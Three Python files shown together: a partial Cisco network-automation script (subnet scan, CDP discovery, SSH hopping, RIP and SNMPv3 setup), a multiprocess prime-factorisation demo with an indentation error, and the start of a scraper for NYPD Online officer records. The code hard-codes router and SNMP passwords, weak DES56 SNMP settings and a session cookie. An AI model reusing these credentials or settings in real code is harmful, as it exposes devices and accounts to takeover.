                sub=list(map(int,sub[0].split(".")))
                sub=arr_to_ip(get_id_net(sub,create_masc_by_prefix(int(pr))))
                sub_n.append(sub)
        self.it= self.it
        for i in range(int(len(self.direcciones)/2)):
            self.it[self.direcciones[i*2]]=self.interfaces[i]
            self.it[f"{self.direcciones[i*2]}-sub"]=sub_n[i]
        global re_n
        re_n[host]=self.it
        return self.it
        """
        # Parse the collected output into the router's interface table.
        listToStr= ' '.join(map(str, routers_Code[self.hostname]))
        listToStr= listToStr.replace(' YES NVRAM up up \n', ' ')
        listToStr= listToStr.replace(' YES manual up up \n', ' ')
        listToStr= listToStr.replace(' ', ' ')
        tempVar= self.hostname.split('.')
        myInterfacesDict= {}
        ripRoutes= []
        if 'Internet' in listToStr:
            # Slice out the "FastEthernet..." interface listing and the
            # "Internet address" listing, then pair interface -> address/subnet.
            fastValueIndex= listToStr.index('Fast')
            interfacesList= listToStr[fastValueIndex:listToStr.index('#', fastValueIndex)].split()
            internetValueIndex= 0
            internetList= []
            if 'Internet' in listToStr:
                internetValueIndex= listToStr.index('Internet', fastValueIndex)
                internetList= listToStr[internetValueIndex:listToStr.index('#', internetValueIndex)].split()
                print('Interfaces de internet: ', internetList)
            for i in interfacesList:
                print('Interfaz: ', i)
                if 'Fast' in i:
                    position= interfacesList.index(i) + 1
                    actualValue= interfacesList[position]
                    sub= ""
                    for int_fa in internetList:
                        if actualValue in int_fa:
                            actualValue= int_fa
                            sub= actualValue.split("/")
                            pr=sub[1]
                            sub=list(map(int,sub[0].split(".")))
                            sub=arr_to_ip(get_id_net(sub,create_masc_by_prefix(int(pr))))
                            break
                    myInterfacesDict[i]= actualValue
                    myInterfacesDict[f"{i}-sub"]= sub
                    ripRoutes.append(sub)
            routers[self.hostname]['Interfaces']= myInterfacesDict
        else:
            # NOTE(review): this branch reads `internetList`, which is only
            # assigned in the `if` branch above — likely a NameError if ever
            # reached; confirm intended behavior.
            interfacesList= listToStr[listToStr.index('Fast'):].split()
            for i in interfacesList:
                print('Interfaz: ', i)
                if 'Fast' in i:
                    position= interfacesList.index(i) + 1
                    actualValue= interfacesList[position]
                    sub= ""
                    for int_fa in internetList:
                        if actualValue in int_fa:
                            actualValue= int_fa
                            sub= actualValue.split("/")
                            pr=sub[1]
                            sub=list(map(int,sub[0].split(".")))
                            sub=arr_to_ip(get_id_net(sub,create_masc_by_prefix(int(pr))))
                            break
                    myInterfacesDict[i]= actualValue
                    myInterfacesDict[f"{i}-sub"]= sub
                    ripRoutes.append(sub)
            routers[self.hostname]['Interfaces']= myInterfacesDict
        # Keep only addresses that do not point at a known neighbor or at the
        # hop we arrived through: those may lead to end hosts.
        routesToHosts= []
        print(f'Del router {self.hostname} se filtrarán las interfaces, válidas de: ')#, myInterfacesDict)
        for key,value in myInterfacesDict.items():
            #routerAnterior= self.k.split('.')
            routerAnterior= value.split('.')
            print('Valor a evaluar: ', routerAnterior)
            if '' not in routerAnterior and 'unassigned' not in routerAnterior:
                routerAnteriorString= routerAnterior[0] + '.' + routerAnterior[1] + '.' + routerAnterior[2] + '.'
                foundCoincidence= False
                for key2,value2 in routers[self.hostname]['Neighbors'].items():
                    #print('Checa al vecino: ', key2, ', ', value2)
                    if routerAnteriorString in value2:
                        foundCoincidence= True
                        break
                routerAnterior= self.ip_direct.split('.')
                routerAnteriorString= routerAnterior[0] + '.' + routerAnterior[1] + '.' + routerAnterior[2] + '.'
                #print('Se compara ', routerAnteriorString, ' contra ', value)
                if routerAnteriorString in value:
                    foundCoincidence= True
                if foundCoincidence is False and 'sub' not in key:
                    routesToHosts.append(value)#.split('/')[0])
                    print('Esta podría ser una direccion válida: ', value.split('/')[0])
            #if self.k not in value and self.ip_direct not in value:
        print('Para las rutas rip usará las direcciones:')
        for i in ripRoutes:
            print('RIP route: ', i)
        rip(self.net_connect, ripRoutes)
        # Shows which ones are possible connections to hosts.
        routers[self.hostname]['RoutesToHosts']= routesToHosts
        routers[self.hostname]['Protocol']= 'RIP'
        # If other routers derive from this one, do not close the connection;
        # otherwise hop back to the previous router.
        if self.willUsePredefinedConnection is False:
            self.net_connect.disconnect()
        else:
            tempVar= self.previousRouter.split('.')
            print('ROUTER ESPERADO: ', tempVar)
            #self.net_connect.send_command('exit', expect_string=r''+self.hostname.split('.')[0]+'(config)#')
            self.net_connect.send_command('exit', expect_string=r''+self.previousRouter.split('.')[0]+'#')
            #self.net_connect.send_command('exit')
        return routers_Code[self.hostname]
class staticConfig:
    """Pushes a fixed command list to a router over a fresh SSH session."""

    def __init__(self, ip_direct):
        # Target address (kept for reference; the connection uses `cisco`).
        self.ip_direct = ip_direct

    def set_data(self, cmd):
        # Store the list of CLI commands to send.
        self.cmd = cmd

    def sendData(self):
        """Open a connection, enter enable mode, and fire every stored command."""
        connection = ConnectHandler(**cisco)
        connection.enable()
        responses = [connection.send_command_timing(command) for command in self.cmd]
class configRouter:
    """Resolves a neighbor's IP via CDP, appends it to the second command,
    then sends the remaining commands over a fresh SSH session."""

    def __init__(self, cmd):
        # cmd[0]: CDP device name to look up; cmd[1]: command prefix that the
        # resolved IP is appended to; cmd[2:]: further commands to send.
        self.cmd= cmd

    def sendData(self):
        #print('Intentará crear la conexión con: ', cisco, ' primer instruccion: ', self.cmd[0])
        net_connect = ConnectHandler(**cisco)
        #print('Se hizo la conexión')
        net_connect.enable()
        self.cmd= self.cmd
        #print('Conexión hecha con los datos', self.cmd)
        print('Direccion que recibe: ', self.cmd[0])
        # "IP address: x.x.x.x" -> token index 2 is the neighbor's IP.
        output = net_connect.send_command_timing(f'show cdp entry {self.cmd[0]} | i IP address').split()
        print('Datos del output: ', output)
        self.cmd[1]= self.cmd[1] + output[2]
        output=[]
        for i in range(1,len(self.cmd)):
            print('Comando a anotar: ', self.cmd[i])
            output.append(net_connect.send_command_timing(self.cmd[i]))
        return output
def process(routerData):
    """Thread target: run the bridged-configuration routine of *routerData*."""
    run = routerData.sendDataToRouter
    run()
def staticProcess(routerData):
    """Thread target: push *routerData*'s static command list to its router."""
    run = routerData.sendData
    run()
def configRouterProcess(routerData):
    """Thread target: run *routerData*'s configuration and print its output."""
    result = routerData.sendData()
    print('Info recuperada: ', result)
def ospfProcess(routerData):
    """Thread target: apply *routerData*'s OSPF configuration."""
    run = routerData.sendData
    run()
def rip(con, ips_id):
    """Configure SNMPv3 and RIP v2 on the router behind connection `con`,
    advertising every network id in `ips_id`."""
    print('Llegó al rip')
    cmd= ['conf t', 'snmp-server view V3Read iso included', 'snmp-server view V3Write iso included',
          'snmp-server group redes3 v3 auth read V3Read write V3Write',
          'snmp-server user admin redes3 v3 auth sha shapass1234 priv des56 despass1234', 'router rip', 'ver 2']
    for i in ips_id:
        cmd.append('network ' + i)
    cmd.append('exit')
    cmd.append('exit')
    configTerminal= []
    for i in range(len(cmd)):
        configTerminal.append(con.send_command_timing(cmd[i]))
    print('Primer comando output: ', configTerminal)
    # NOTE(review): `time` is not imported in this module's visible imports —
    # presumably provided by `from detecta import *` or `from ssh_connect import *`; confirm.
    time.sleep(1)
def configure_router(router,hostname,con):
    """Hop from the current router (`hostname`, via `con`) into neighbor
    `router` over SSH, discover its neighbors recursively, then hop back.
    Returns the neighbor's IP address as reported by CDP."""
    #print(f'Intenta ejecutar show cdp entry {router} | i IP address')
    output = con.send_command(f'show cdp entry {router} | i IP address')
    resp = output.split()
    print('Respuesta: ', resp)
    # resp[2] is the neighbor's IP from the "IP address: x.x.x.x" line.
    con.send_command('ssh -l '+cisco['username']+' '+resp[2],expect_string=r'Password:')
    tempVar= router.split('.')
    #print('Router a buscar: ', tempVar)
    con.send_command(cisco['password'], expect_string=r''+tempVar[0]+'#')
    #print('Pasará a configurar RIP')
    #rip(con)
    neighbors(router, con)
    newHostName= hostname.split('.')
    #print(f'Se espera al comando: {newHostName[0]}#')
    # 'exit' drops us back onto the previous router's prompt.
    con.send_command('exit',expect_string=newHostName[0]+'#')
    return resp[2]
def neighbors(hostname, con):
    """Discover the CDP neighbors of `hostname` through connection `con`,
    recursing into unseen routers, and record them in the global `routers`."""
    output = con.send_command('show cdp neighbors detail | i Device ID')
    output2 = con.send_command('show cdp neighbors detail | i IP address')
    routersOutput = output.split()
    addressOutput = output2.split()
    print(f'OUTPUT: {routersOutput} y {addressOutput}')
    varTempRouters= {}
    # Tokens repeat every 3 ("Device ID: <name>"); start at the first name.
    i = 2
    while i < len(routersOutput):
        tempRouter= routersOutput[i].split(".")
        if tempRouter[0] not in known_routers:
            print('ROUTER AGREGADO: ', tempRouter[0])
            print(routersOutput[i], ":")
            known_routers.append(tempRouter[0])
            # Recurse: configure_router hops into the neighbor and calls back here.
            varTempRouters[routersOutput[i]]= configure_router(routersOutput[i],hostname,con)
        else:
            varTempRouters[routersOutput[i]]= addressOutput[i]
        """
        if tempRouter[0] not in known_routers:
            print('ROUTER AGREGADO: ', tempRouter[0])
            print(routersOutput[i], ":")
            known_routers.append(tempRouter[0])
            varTempRouters[routersOutput[i]]= configure_router(routersOutput[i],hostname,con)
        else:
            varTempRouters[routersOutput[i]]= ''
        """
        i = i + 3
    # Local dict intentionally(?) shadows this function's name below.
    neighbors= {}
    neighbors['Neighbors']= varTempRouters
    routers[hostname]= neighbors
    # Threads were used here previously (kept for reference):
    #print(f'Hilo del router {hostname} iniciado')
    #threads.append(Thread(target=rip,args=(con,)))
    #threads[-1].start()
def scan_by_interface(interface_name="enp0s9",user="admin",password="admin",secret="1234"):
    """Scan the IPv4 subnet attached to *interface_name*, discover the Cisco
    routers on it, configure RIP on them (neighbors are handled by worker
    threads), and persist the resulting topology to ``routers.json``.

    Parameters:
        interface_name: local interface whose subnet is scanned.
        user/password/secret: credentials used for every device connection.

    Returns:
        The JSON-serialized ``routers`` dictionary on success, or
        ``[-1, -1]`` when the interface has no IPv4 address.

    NOTE(review): depends on module-level globals (``cisco``, ``routers``,
    ``known_routers``, ``routers_alreadyConfigured``, ``threads``,
    ``amountOfRouters``, ``routers_Code``) and on helpers defined elsewhere
    in this file (``conectar``, ``scan_range``, ``neighbors``, ``rip``,
    ``process``, ``dataToRouter`` ...) — confirm their contracts before reuse.
    """
    global cisco
    # Credentials for every netmiko connection made during the scan.
    cisco["username"]= user
    cisco["password"]= password
    cisco["secret"]= secret
    # Fetch the address dictionary for the network interface.
    dic_data=ni.ifaddresses(interface_name)
    if 2 not in dic_data:
        # netifaces key 2 (AF_INET) missing -> no IPv4 address configured.
        print("No hay una dirección IPv4 en la interfaz")
        return [-1,-1]
    dic_data=dic_data[2][0]
    print(f"\nInformación\n{interface_name}:{dic_data}")
    addr=list(map(int,dic_data["addr"].split(".")))
    net=list(map(int,dic_data["netmask"].split(".")))
    c=determinate_prefix(net)
    # Compute the subnet identifier.
    idnet=get_id_net(addr,net)
    # Compute the broadcast address.
    range_net=get_broadcast_ip(idnet,net)
    print(f"Address: {addr}\nNetmask:{net}\nIdnet\n\tID: {(idnet)}/{c}\n\tNet: {(net)}\n\Range_net: {(range_net)}")
    print(f"Red a Escanear\n\tID: {arr_to_ip(idnet)}/{c}\n\tNetmask: {arr_to_ip(net)}\n\tBroadcast: {arr_to_ip(range_net)}")
    # First usable host address of the subnet, for the reachability scan.
    ips=[idnet[0],idnet[1],idnet[2],idnet[3]+1]
    print('Interfaces: ', ni.gateways())
    responde=scan_range(ips,range_net)
    # First filtering pass keeping only Cisco devices (currently disabled).
    """
    ciscos=[]
    for i in range(len(responde)):
        for k,v in responde[i].items():
            if "Cisco_Router_IOS" in v:
                print("Añadiendo: ", responde[i])
                ciscos.append(responde[i])
    """
    # Take the entry-point router from the first scan result; the loop leaves
    # cisco['ip'] set to the last key of responde[0].
    for k,v in responde[0].items():
        print(f"Estableciendo conexión con la dirección: {k}")
        cisco['ip'] = k
    #print(f"Solo routers cisco: {ciscos}")
    # After the scan, connect (SSH/telnet) to the Cisco device and pull
    # CDP neighbor, hostname and interface information.
    cmd=["sh cdp neigh detail | i IP address","sh cdp neigh detail | i Device ID","sh run | include hostname",
         "sh ip int br | include up", "sh ip int | include Internet address"]
    red={}
    net_router={}
    # Router data (interfaces).
    output=conectar(cisco,cmd)
    #dir=re.split("\n| Internet address is | ",output[0])
    #inte=re.split("\n| YES NVRAM up up | YES manual up up | ",output[1])
    host_cmd= output[2].split("hostname ")[1]
    interf= output[3].split()
    direcciones= output[4].split()
    #print('Interfaces: ', interf, '\nDirecciones: ', direcciones)
    myInterfacesDict= {}
    ripRoutes= []
    # Map each FastEthernet interface to its address and derived subnet id.
    for i in interf:
        if 'Fast' in i:
            position= interf.index(i) + 1
            actualValue= interf[position]
            sub= ""
            for int_fa in direcciones:
                if actualValue in int_fa:
                    actualValue= int_fa
                    sub= actualValue.split("/")
                    pr=sub[1]
                    sub=list(map(int,sub[0].split(".")))
                    sub=arr_to_ip(get_id_net(sub,create_masc_by_prefix(int(pr))))
                    break
            myInterfacesDict[i]= actualValue
            myInterfacesDict[f"{i}-sub"]= sub
            ripRoutes.append(sub)
    con = ConnectHandler(**cisco)
    rip(con, ripRoutes)
    con.disconnect()
    print('Directorio: ', myInterfacesDict)
    print("\n\n\n")
    known_routers.append(host_cmd)
    # Build the FQDN of the main router from the CDP device-id domain suffix.
    val= output[1].split()[2]
    host_cmd= val.replace(val.split('.')[0], host_cmd)
    print('Router Principal: ', host_cmd)
    routers_alreadyConfigured.append(host_cmd)
    # Discover the neighbors of the main router.
    con = ConnectHandler(**cisco)
    neighbors(host_cmd, con)
    con.disconnect()
    tempHost= []
    tempHost.append(cisco['ip'] + '/' + str(c))
    routers[host_cmd]['Interfaces']= myInterfacesDict
    routers[host_cmd]['RoutesToHosts']= tempHost
    routers[host_cmd]['Protocol']= 'RIP'
    routers[host_cmd]['Ip']= cisco['ip']
    json_routers=json.dumps(routers,sort_keys=True,indent=4)
    newDict= json.loads(json_routers)
    print(f"Diccionario de routers:\n{json_routers}")
    cmd=['','ssh -l '+cisco['username']+' ',cisco['password'],'exit']
    # Pick only the first router key (break after one iteration).
    for key,values in newDict.items():
        cmd[0]= key
        print('Router elegido: ', key, ' y el cmd dice: ', cmd[0])
        break
    #cmd=["ssh -l admin ","show cdp neigh detail","admin","ena","1234","sh ip int | i Internet address",
    #     "sh ip int br | include up","sh run | include hostname","exit"]
    cmd=["ssh -l admin ","admin","ena","1234", "sh ip int br | include up", "sh ip int | include Internet address"]#,"exit"]
    rawCmd=["","admin","1234", "sh ip int br | include up", "sh ip int | i Internet address"]#, "exit"]
    # Configure each discovered neighbor in its own worker thread.
    for key, values in newDict[host_cmd]['Neighbors'].items():
        print('Elemento dentro: ', values)
        global amountOfRouters
        amountOfRouters= amountOfRouters + 1
        routers_alreadyConfigured.append(key)
        router= dataToRouter(values, host_cmd, key, ConnectHandler(**cisco))
        router.set_data(cisco['ip'], cmd, rawCmd, False)
        threads.append(Thread(target=process,args=(router,)))
        threads[-1].start()
    # Join worker threads; the thread list may keep growing while we wait,
    # so the bound is re-read every iteration.
    actualAmountOfThreads= len(threads)
    threadCounter= 0
    while threadCounter < actualAmountOfThreads:
        print('CANTIDAD DE HILOS: ', amountOfRouters)
        threads[amountOfRouters - 1 - threadCounter].join()
        threadCounter= threadCounter + 1
        actualAmountOfThreads= len(threads)
    new_datos= json.dumps(routers_Code,sort_keys=True,indent=4)
    print(f'Datos: {new_datos}')
    new_json_routers=json.dumps(routers,sort_keys=True,indent=4)
    print(f"Diccionario de routers:\n{new_json_routers}")
    # NOTE(review): this dumps the already-serialized JSON *string*, producing
    # a double-encoded file; confirm whether `routers` itself was intended.
    with open('routers.json','w') as outfile:
        json.dump(new_json_routers,outfile,indent=4)
    # TODO (translated from Spanish): next step is working out how to connect
    # to the host on each router's candidate route.
    """
    #Primero hay que obtener el identificador de red, esto es pasar /24 a 255.255.255.0 o sus equivalentes
    data= routers['R1.adminredes.escom.ipn.mx']['RoutesToHosts'][0]
    chosenIp= data[:data.index('/')]
    chosenNetMask= data[(data.index('/') + 1):]
    print(f'Host a visitar: {chosenIp} con máscara de subred: {chosenNetMask}')
    addr= turnIpToArray(chosenIp)
    net= determinate_prefix_inverse(int(chosenNetMask))
    print(f'\nConvertida en {addr} con máscara {net}')
    idnet=get_id_net(addr,net)
    # range_net es la dirección de broadcast, esto es para un 10.0.1.1/24 lo torna en 10.0.1.255
    range_net=get_broadcast_ip(idnet,net)
    #ips viene siendo la dirección 1 de la subred a la que se está conectado, esto es, 10.0.1.0 lo torna en 10.0.1.1
    ips=[idnet[0],idnet[1],idnet[2],idnet[3]+1]
    responde=look_for_hosts('R1.adminredes.escom.ipn.mx',ips,range_net)
    conexiones= verifica_conectividad(routers)
    """
    """
    cmd=["sh ip int | i Internet address","sh ip int br | include up","sh run | include hostname"]
    c=0
    red={}
    net_router={}
    for i in ciscos:
        flag=False
        # Los datos del router (Interfaces)
        for k,v in i.items():
            print(f"Estableciendo conexión con la dirección: {k}")
            cisco["ip"]=k
            output=conectar(cisco,cmd)
            print('Output: ', output)
            dir=re.split("\n| Internet address is | ",output[0])
            inte=re.split("\n| YES NVRAM up up | YES manual up up | ",output[1])
            host_cmd=output[2].split("hostname ")[1]
            direcciones=[]
            interf=[]
            for j in dir:
                if j!="":
                    direcciones.append(j)
            for j in inte:
                if j!="":
                    interf.append(j)
            if host_cmd in red.keys():
                flag=False
            else:
                flag=True
            if flag:
                iter={}
                for j in range(len(direcciones)):
                    iter[interf[(j*2)]]=direcciones[j]
                    sub=direcciones[j].split("/")
                    pr=sub[1]
                    sub=list(map(int,sub[0].split(".")))
                    sub=arr_to_ip(get_id_net(sub,create_masc_by_prefix(int(pr))))
                    iter[f"{interf[(j*2)]}-sub"]=sub
                red[host_cmd]=iter
            dir.clear()
            inte.clear()
            direcciones.clear()
    print("\n\n\n")
    for i in red.items():
        print('Router: ', i, '\n\n')
    """
    """
    threads= []
    cmd=["ssh -l admin ","admin","ena","1234","sh ip int | i Internet address","sh ip int br | include up","sh run | include hostname","exit"]
    # Obtiene los datos de la interfaz y se intenta conectar a la ip-1 a la que esta conectada
    for i in ciscos:
        for k,v in i.items():
            cisco["ip"]=k
            for l,m in red.items():
                for n,o in m.items():
                    ip_r=o.split("/")
                    if ip_r[0]!=k and "-sub" not in n:
                        ip_r=list(map(int,ip_r[0].split(".")))
                        ip_r[3]-=1 #Para este caso cambia la ip del gateway, de P_3 de 254 asigna a la otra la 253
                        ip_r=arr_to_ip(ip_r)
                        print('IP: ', ip_r)
                        router= dataToRouter(ip_r)
                        router.set_data(k, cmd)
                        threads.append(Thread(target=process,args=(router,)))
                        threads[-1].start()
    #Detener hilos
    for t in range(len(threads)):
        threads[t].join()
    for k,v in re_n.items():
        red[k]=v
    json_routers=json.dumps(red,sort_keys=True,indent=4)
    print(f"Diccionario de routers:\n{json_routers}")
    route=[]
    protocolsThreads= []
    conexiones=verifica_conectividad(red)
    # Se realiza las configuraciones de los routers permitiendo redistribución entre protocolos dinamicos y el estatico
    for i,j in red.items():
        route=[]
        if "1" in i:
            print(f"\nEnrutamiento estático hacia -> {i}")
            for k,v in red.items():
                if "1" not in k:
                    for l,m in v.items():
                        if "-sub" in l and m not in route and n not in v.values():
                            route.append(m)
            resultado=conexiones[verifica_index(conexiones,i)]
            parser=resultado.split(":")
            routers=parser[0].split("-")
            net=parser[1]
            route_c=[]
            for k,v in red.items():
                if "1" in k:
                    for l,m in v.items():
                        if "-sub" in l and m not in route:
                            route_c.append(m)
            route.remove(net)
            #print(f"{routers[0]} enruta hacia {routers[1]} con net {route_c}")
            #print(f"{routers[1]} enruta hacia {routers[0]} con net {route}")
            # Aca desarrollamos el comando en conjunto de las IP's que estan interconectadas
            # Obtenemos ip del R[0] hacia que ip salen la redirección de datos de R[1]
            ip_r1=list(red[routers[1]].values())
            ip=ip_r1.index(net)-1
            ip_r1=ip_r1[ip].split("/")[0]
            # Obtenemos ip del R[1] hacia que ip salen la redirección de datos de R[0]
            ip_r2=list(red[routers[0]].values())
            ip=ip_r2.index(net)-1
            ip_r2=ip_r2[ip].split("/")[0]
            cmd=["conf t"]
            for a in route_c:
                cmd.append(f"ip route {a} 255.255.255.0 {ip_r1}")
            cmd.append("end")
            #print(f"{routers[0]} manda comandos hacia si mismo con configuracion= {cmd}")
            router= staticConfig(ip_r)
            router.set_data(cmd)
            protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
            protocolsThreads[-1].start()
            #output=conectar_bridge(cisco,cmd)
            cmd=[f"ssh -l admin {ip_r1}","admin","ena","1234","conf t"]
            for a in route:
                cmd.append(f"ip route {a} 255.255.255.0 {ip_r2}")
            cmd.append("end")
            cmd.append("exit")
            #print(f"{routers[0]} manda comandos hacia {routers[1]} con configuracion= {cmd}")
            router= staticConfig(ip_r2)
            router.set_data(cmd)
            protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
            protocolsThreads[-1].start()
            #output=conectar_bridge(cisco,cmd)
        elif "2" in i:
            print(f"\nEnrutamiento RIP {i}")
            resultado=conexiones[verifica_index(conexiones,i)]
            parser=resultado.split(":")
            routers=parser[0].split("-")
            net=parser[1]
            print(f"Conexion entre {routers[0]} y {routers[1]} con la ip {net}")
            routes_r1=[]
            routes_r2=[]
            ip_r1=list(red[routers[0]].values())
            for i in ip_r1:
                if "/" not in i:
                    routes_r1.append(i)
            ip_r1=list(red[routers[1]].values())
            for i in ip_r1:
                if "/" not in i:
                    routes_r2.append(i)
            cmd=["conf t","router rip","ver 2","redistribute static","redistribute ospf 1","default-metric 1"]
            for i in routes_r1:
                cmd.append(f"net {i}")
            cmd.append("end")
            #print(f"{routers[0]} manda comandos hacia si mismo con configuracion= {cmd}")
            router= staticConfig(ip_r2)
            router.set_data(cmd)
            protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
            protocolsThreads[-1].start()
            #output=conectar_bridge(cisco,cmd)
            # Sale la IP R[1]
            ip_r1=list(red[routers[1]].values())
            ip=ip_r1.index(net)-1
            ip_r1=ip_r1[ip].split("/")[0]
            #########################
            cmd=[f"ssh -l admin {ip_r1}","admin","ena","1234","conf t","router rip","ver 2","redistribute static","redistribute ospf 1","default-metric 1"]
            for i in routes_r2:
                cmd.append(f"net {i}")
            cmd.append("end")
            cmd.append("exit")
            #print(f"{routers[0]} manda comandos hacia {routers[1]} con configuracion= {cmd}")
            router= staticConfig(ip_r1)
            router.set_data(cmd)
            protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
            protocolsThreads[-1].start()
            #output=conectar_bridge(cisco,cmd)
        elif "3" in i:
            print(f"\nEnrutamiento OSPF {i}")
            resultado=conexiones[verifica_index(conexiones,i)]
            parser=resultado.split(":")
            routers=parser[0].split("-")
            net=parser[1]
            print(f"Conexion entre {routers[0]} y {routers[1]} con la ip {net}")
            routes_r1=[]
            routes_r2=[]
            ip_r1=list(red[routers[0]].values())
            for i in ip_r1:
                if "/" not in i:
                    routes_r1.append(i)
            ip_r1=list(red[routers[1]].values())
            for i in ip_r1:
                if "/" not in i:
                    routes_r2.append(i)
            cmd=["conf t","int loop0","ip add 200.0.0.1 255.255.255.255",
                 "no sh","exit","router ospf 1","ver 2","router ospf 1",
                 "redistribute static metric 200 subnets",
                 "redistribute rip metric 200 subnets"]
            for i in routes_r1:
                cmd.append(f"net {i} 0.0.0.255 area 0")
            cmd.append("end")
            #print(f"{routers[0]} manda comandos hacia si mismo con configuracion= {cmd}")
            router= staticConfig(ip_r1)
            router.set_data(cmd)
            protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
            protocolsThreads[-1].start()
            #output=conectar_bridge(cisco,cmd)
            # Sale la IP R[1]
            ip_r1=list(red[routers[1]].values())
            ip=ip_r1.index(net)-1
            ip_r1=ip_r1[ip].split("/")[0]
            #########################
            cmd=[f"ssh -l admin {ip_r1}","admin","ena","1234","conf t",
                 "int loop0","ip add 200.0.0.2 255.255.255.255",
                 "no sh","exit","router ospf 2","ver 2","router ospf 2",
                 "redistribute static metric 200 subnets",
                 "redistribute rip metric 200 subnets"]
            for i in routes_r2:
                cmd.append(f"net {i} 0.0.0.255 area 0")
            cmd.append("end")
            cmd.append("exit")
            #print(f"{routers[0]} manda comandos hacia {routers[1]} con configuracion= {cmd}")
            router= staticConfig(ip_r1)
            router.set_data(cmd)
            protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
            protocolsThreads[-1].start()
            #output=conectar_bridge(cisco,cmd)
    for t in range(len(protocolsThreads)):
        protocolsThreads[t].join()
    """
    print("\nSe han levantado todos los protocolos para comunicarnos entre routers")
    return new_json_routers
|
concurrentCalculation.py | import time
import random
from multiprocessing import Process
# This does all of our prime factorization on a given number 'n'
def calculatePrimeFactors(n):
    """Return the prime factorization of n as an ascending list.

    Repeated prime factors appear once per occurrence, so the product of
    the returned list equals the original n. For n <= 1 the list is empty.
    """
    factors = []
    divisor = 2
    # Trial division: once divisor**2 exceeds the remaining n, what is
    # left (if > 1) must itself be prime.
    while divisor * divisor <= n:
        quotient, remainder = divmod(n, divisor)
        if remainder:
            divisor += 1
        else:
            factors.append(divisor)
            n = quotient
    if n > 1:
        factors.append(n)
    return factors
# Worker body: one tenth of the overall workload — the original batch of
# 10,000 calculations is split into 10 batches of 1,000.
def executeProc():
    """Factorize 1,000 random integers, printing each factor list."""
    for _ in range(1000):
        number = random.randint(20000, 100000000)
        print(calculatePrimeFactors(number))
def main():
    """Fan the factorization workload out across 10 processes and time it."""
    print("Starting number crunching")
    start = time.time()
    # Create and launch all worker processes up front.
    workers = [Process(target=executeProc, args=()) for _ in range(10)]
    for worker in workers:
        worker.start()
    # Wait for every worker to finish before measuring elapsed time.
    for worker in workers:
        worker.join()
    elapsed = time.time() - start
    # Report the wall-clock time for the whole 10-process run.
    print("Execution Time: {}".format(elapsed))
if __name__ == '__main__':
main() |
savedata.py | """ Download and save officer data from NYPD Online
Example usage:
./savedata
"""
import requests
import os
import json
import six
import threading
import time
# Tax IDs seen so far; a dict used as a set (values are always True).
tax_id_dict = {}
# Paginated roster endpoint; the page number is appended at the end and
# '&pageSize=N' is added by the caller.
LIST_URL = 'https://oip.nypdonline.org/api/reports/2/datasource/serverList?aggregate=&filter=&group=&page='
# Base URL for per-filter detail reports ('<filter>/datasource/list' is appended).
DETAIL_URL = 'https://oip.nypdonline.org/api/reports/'
# Endpoint returning a single officer's summary record.
OFFICER_URL = 'https://oip.nypdonline.org/api/reports/1/datasource/list'
# Directory that receives one folder per officer.
SAVE_DICTIONARY = './data-folders/'
TMP_DIRECTORY = './tmp/'
# File caching the collected tax-ID list between runs.
SAVE_TAX_ID_LIST = 'tax_id_list'
# Report/filter ids fetched for every officer (each becomes one detail request).
LIST_OF_FILTERS = [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,2041,2042]
def append_to_tax_id_dict(value_to_append):
    """Record a tax ID in the global cache, reporting duplicates."""
    if value_to_append not in tax_id_dict:
        tax_id_dict[value_to_append] = True
    else:
        # Already seen — flag it but leave the cache unchanged.
        print(" DUPLICATE found"+str(value_to_append))
def make_folder(folder_path):
    """Create *folder_path*, including any missing parents.

    Fix: os.mkdir raised FileExistsError on re-runs (e.g. when a record is
    re-downloaded) and FileNotFoundError when the parent data folder was
    missing; os.makedirs with exist_ok=True makes the call idempotent.
    """
    os.makedirs(folder_path, exist_ok=True)
def query_list_url_get_taxids(page,pageSize):
    """Page through the roster list endpoint, collecting every tax ID.

    Starts at *page*, requesting *pageSize* rows per call, and feeds each
    row's 'RowValue' (the tax ID) into the global cache. Returns the full
    list of collected tax IDs once all pages are consumed.

    Fix: the original recursed once per page, which can exceed Python's
    recursion limit on large rosters; rewritten as an equivalent loop.
    NOTE(review): the Cookie header is a hard-coded session token and must
    be refreshed when it expires.
    """
    headers = {'Content-Type': 'application/json','Cookie': 'user=Dl03--EYI2nawt3xnyi8U-zVa8MFSosL8CIh-v9M-9hDSVxFNeD4mkvoH1RVEzBIZkHau5xp57PiqDp6EHzKzHbywKfQ8PzHFAT8bhloKh0zQFqPC1OO1Uxn4QnxfX_N6wmmZbTaGkZQOFgYxcMYfBLv6ZutVAukPV6CzbxzljqdXeYYbQxpG-PXT-Wy1GITH3h1WjwR4oyg21iHzq04Nhykhbf3IkDGWXYIPgmxK8ARs0WtdoYnSOyXNIMvjT99qCKOKA83Idg1a-lLk-8HGV-p3C8ilYPVfGtkY2kJPuN9K_bNOYg7DSm0CPbRShOrg46eRvz-n5pz9oR8jtignx1c49gG4ER-OKxssLQA07_zBT5RaqYt58-r4lMe790i; BNI_persistence=fQZHNVs5szWnatWt8bmuAJzA1b_wBc4-MEyNgCTaFVZXK0PKH-jBaxkrS6oaSZ0Bz_eln6qu8a74Wj0uSvRC7g=='}
    while True:
        url = LIST_URL+str(page)+'&pageSize='+str(pageSize)
        r = requests.get(url, headers=headers)
        jsonreturn = r.json()
        total = jsonreturn['Total']
        for returned_value in jsonreturn['Data']:
            append_to_tax_id_dict(returned_value['RowValue'])
        if (page*pageSize<total):
            page = page + 1
        else:
            return list(tax_id_dict.keys())
def save_officer_record_to_file_with_tax_id_return_folder_path(tax_id):
    """Fetch one officer's summary record, save it under a new folder, then
    spawn one thread per detail filter to download the detail reports.

    NOTE(review): despite the name, no value is returned — the caller in
    save_officer_info_with_list_tax_ids discards the result anyway.
    """
    # Server-side filter selecting the officer by tax ID.
    data = '{"filters":[{"key":"@TAXID","label":"TAXID","values":["'+str(tax_id)+'"]}]}'
    # Hard-coded session cookie — must be refreshed when it expires.
